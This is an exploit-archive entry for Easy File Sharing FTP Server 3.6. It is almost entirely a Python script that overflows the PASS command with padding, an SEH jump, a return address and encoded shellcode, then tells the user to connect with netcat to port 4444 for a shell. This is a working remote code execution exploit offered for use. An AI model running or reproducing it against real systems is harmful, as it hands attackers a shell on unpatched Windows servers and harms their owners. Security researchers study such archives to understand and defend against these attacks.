Easy File Sharing FTP Server 3.6 stack buffer overflow Exploit

2016-11-11T00:00:00
ID 1337DAY-ID-26310
Type zdt
Reporter Achilles
Modified 2016-11-11T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            !/usr/bin/env python
# Exploit Title: Easy File Sharing FTP Server 3.6 stack buffer overflow
# Date: 11.11.2016
# Exploit Author: ACHILLES
# Vendor Homepage: http://www.efssoft.com
# Software Link: http://www.efssoft.com/ftpserver.htm
# Version: 3.6
# Tested on: Windows 8.1 Enterprise , English
#          : Windows 7 Enterprise SP1, English
#          : Windows XP SP3, English
#
import socket
import struct
import os
import time

shellcode = ( 
"\xbf\xd0\x8a\x44\x2d\xd9\xc3\xd9\x74\x24\xf4\x5d\x33\xc9"
"\xb1\x53\x31\x7d\x12\x83\xed\xfc\x03\xad\x84\xa6\xd8\xb1"
"\x71\xa4\x23\x49\x82\xc9\xaa\xac\xb3\xc9\xc9\xa5\xe4\xf9"
"\x9a\xeb\x08\x71\xce\x1f\x9a\xf7\xc7\x10\x2b\xbd\x31\x1f"
"\xac\xee\x02\x3e\x2e\xed\x56\xe0\x0f\x3e\xab\xe1\x48\x23"
"\x46\xb3\x01\x2f\xf5\x23\x25\x65\xc6\xc8\x75\x6b\x4e\x2d"
"\xcd\x8a\x7f\xe0\x45\xd5\x5f\x03\x89\x6d\xd6\x1b\xce\x48"
"\xa0\x90\x24\x26\x33\x70\x75\xc7\x98\xbd\xb9\x3a\xe0\xfa"
"\x7e\xa5\x97\xf2\x7c\x58\xa0\xc1\xff\x86\x25\xd1\x58\x4c"
"\x9d\x3d\x58\x81\x78\xb6\x56\x6e\x0e\x90\x7a\x71\xc3\xab"
"\x87\xfa\xe2\x7b\x0e\xb8\xc0\x5f\x4a\x1a\x68\xc6\x36\xcd"
"\x95\x18\x99\xb2\x33\x53\x34\xa6\x49\x3e\x51\x0b\x60\xc0"
"\xa1\x03\xf3\xb3\x93\x8c\xaf\x5b\x98\x45\x76\x9c\xdf\x7f"
"\xce\x32\x1e\x80\x2f\x1b\xe5\xd4\x7f\x33\xcc\x54\x14\xc3"
"\xf1\x80\x81\xcb\x54\x7b\xb4\x36\x26\x2b\x78\x98\xcf\x21"
"\x77\xc7\xf0\x49\x5d\x60\x98\xb7\x5e\x9f\x05\x31\xb8\xf5"
"\xa5\x17\x12\x61\x04\x4c\xab\x16\x77\xa6\x83\xb0\x30\xa0"
"\x14\xbf\xc0\xe6\x32\x57\x4b\xe5\x86\x46\x4c\x20\xaf\x1f"
"\xdb\xbe\x3e\x52\x7d\xbe\x6a\x04\x1e\x2d\xf1\xd4\x69\x4e"
"\xae\x83\x3e\xa0\xa7\x41\xd3\x9b\x11\x77\x2e\x7d\x59\x33"
"\xf5\xbe\x64\xba\x78\xfa\x42\xac\x44\x03\xcf\x98\x18\x52"
"\x99\x76\xdf\x0c\x6b\x20\x89\xe3\x25\xa4\x4c\xc8\xf5\xb2"
"\x50\x05\x80\x5a\xe0\xf0\xd5\x65\xcd\x94\xd1\x1e\x33\x05"
"\x1d\xf5\xf7\x35\x54\x57\x51\xde\x31\x02\xe3\x83\xc1\xf9"
"\x20\xba\x41\x0b\xd9\x39\x59\x7e\xdc\x06\xdd\x93\xac\x17"
"\x88\x93\x03\x17\x99"
)
payload = "\x2c"
payload += "A"*2559
payload += "\xeb\x19\x90\x90"               
payload += struct.pack("<I", 0x10017F21)    
payload += "\x90"*30
payload += shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server = raw_input('Enter IP : ')
s.connect((server, 21))
print "[+]Sending the Shellcode"
s.recv(1024)
print "[+]nc " + server + ":4444 and check the shell"
print "\r"
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS " + payload + "\r\n")
s.recv(1024)
s.close()

#  0day.today [2018-02-09]  #